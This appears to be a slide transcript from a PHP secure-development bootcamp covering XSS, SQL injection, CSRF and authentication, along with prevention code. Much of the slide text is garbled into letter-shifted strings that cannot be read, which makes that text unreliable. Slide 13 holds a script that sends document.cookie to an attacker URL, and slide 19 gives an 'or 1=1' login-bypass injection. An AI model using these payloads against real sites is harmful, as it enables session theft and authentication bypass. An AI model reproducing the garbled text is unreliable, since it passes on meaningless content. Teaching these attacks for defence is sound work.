PHP Security Bootcamp

Transcript

1. Secure PHP Development $ISJT
   $PSOVUU
   
   !FOZHNB

2. 1)1
   %FW
   
   :FBST
   "QQTFD
   &OHJOFFS
   IUUQXFCTFDJP
   IUUQTFDVSJOHQIQDPN

3. Goals #BTJD
   BQQTFD
   QSJODJQMFT
   7VMOFSBCJMJUJFT
   
   &YQMPJUT
   )BOETPO
   FYQFSJFODF
   5PPMT5FDIOJRVFT

4. IUUQCJUMZPXBTQUPQ

5. 5IFSF`T
   
   OP
   TVDI
   UIJOH
   
   BT
   
   TFDVSF

6. IUUQTHJUIVCDPNQTFDJPOPUDI /PUDI
   "
   7VMOFSBCMF
   "QQMJDBUJPO

7. IUUQTHJUIVCDPNQTFDJPOPUDI 4FUVQ
   5JNF PS
   IUUQOPUDITFDVSJOHQIQDPN

8. None

9. XSS: Cross Site Scripting

10. *OKFDUJPO
    PG
    DPOUFOU
    JOUP
    UIF
    QBHF
    VTVBMMZ
    +BWBTDSJQU
    SFqFDUFE
    WT
    TUPSFE
    QPPS
    PVUQVU
    FTDBQJOH

11. $44
    +BWBTDSJQU
    )5.-
    )5.-
    "UUSJCVUF
    2VFSZ
    WBMVF Context style: foo-<?=$input?> var name

    = “<?=$input?>”; <div><?=$input?></div> <span style=“<?=$input?>”>foo</span> $url = “http://foo.com?data=“.$input

12. Example <?php echo “Howdy, my name is “.$_GET[‘name’]; ?> ?name=<script>alert(“xss”)</script>

13. Example <script> xmlhttp = new XMLHttpRequest(); xmlhttp.open( 'GET', ‘http://leethack.php?cookies=‘+document.cookie, true);

    xmlhttp.send(); </script> "TTVNFT
    DSPTTPSJHJO
    QPMJDZ
    PG
    

14. Your Turn

15. Prevention #1 <?php $name = htmlspecialchars( $_GET[‘name’], ENT_COMPAT, ‘UTF-8’ );

    echo “Howdy, my name is “.$name; ?> /PUF
    5IJT
    JT
    POMZ
    GPS
    B
    )5.-
    DPOUFYU

16. Prevention #2 {{ name|e(‘html’) }} {{ name|e(‘html_attr’) }} {{ name|e(‘js’)

    }} {{ name|e(‘css’) }} /PUF
    5IJT
    FYBNQMF
    SFRVJSFT
    5XJH

17. SQLi: SQL Injection

18. *OKFDUJPO
    TQFDJpD
    UP
    42-
    TUBUFNFOUT
    FYQPTF
    EBUB
    CZQBTT
    BVUI
    NFDIBOJTNT
    QPPS
    JOQVU
    pMUFSJOH

19. Example $sql = ‘select id from users where username =

    “‘.$_POST[‘username’].’” and password = “‘.$_POST[‘password’].’”’; password=‘ or 1=1; # select id from users where username = “user1” and password = “” or 1=1; #

20. BEE@TMBTIFT
    NZTRM@SFBM@FTDBQF@TUSJOH
    NZTRMJ@SFBM@FTDBQF@TUSJOH

21. BEE@TMBTIFT
    NZTRM@SFBM@FTDBQF@TUSJOH
    NZTRMJ@SFBM@FTDBQF@TUSJOH X

22. 1SFQBSFE
    TUBUFNFOUT
    1%0
    .ZTRMJ

23. Your Turn

24. Prevention <?php $stmt = $dbh->prepare(‘select id from users’ .’ where

    username = :user’ .’ and password = :pass’); $stmt->execute(array( ‘user’ => $_POST[‘username’], ‘pass’ => $_POST[‘password’] )); $results = $stmt->fetchAll(PDO::FETCH_ASSOC); ?> /PUF
    5IJT
    FYBNQMF
    SFRVJSFT
    1%0
    TVQQPSU

25. CSRF: Cross Site Request Forgery

26. VOWBMJEBUFE
    GPSN
    TVCNJTTJPO
    PO
    BMM
    TUBUF
    DIBOHFT
    XIBU`T
    UIF
    TPVSDF
    TJNQMF
    SBOEPNJ[FE
    GPS
    FBDI
    GPSN

27. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> </form>

28. Example <form action=“/user/register” method=“POST”> <input type=“text” name=“username”/> <input type=“password” name=“password”/>

    <input type=“submit” value=“Register”/> <input type=“hidden” value=“098f6bcd4621d373cade4e832627b4f6” name=“csrf-token”/> </form>

29. Auth*: Authentication & Authorization

30. EJSFDU
    PCKFDU
    SFGFSFODF
    "
    EBUB
    BDDFTT
    EBOHFSPVT
    BDUJPOT
    QPPS
    VTFS
    NBOBHFNFOU

31. Your Turn

32. QMBJOUFYU
    QBTTXPSET
    OP
    QBTTXPSE
    QPMJDZ
    PWFSMZ
    DPNQMFY
    QBTTXPSET
    QBTTXPSE
    IJOUT

33. None
34. None

35. But wait, there’s more…

36. 4FDVSJUZ
    .JTDPOpHVSBUJPO
    4FOTJUJWF
    %BUB
    &YQPTVSF
    $PNQPOFOUT
    XJUI
    ,OPXO
    7VMOFSBCJMJUJFT
    6OWBMJEBUFE
    3FEJSFDUT
    BOE
    'PSXBSET

37. 5IBU`T
    BMM
    GPMLT
    !FOZHNB
    !TFDVSJOHQIQ
    IUUQTFDVSJOHQIQDPN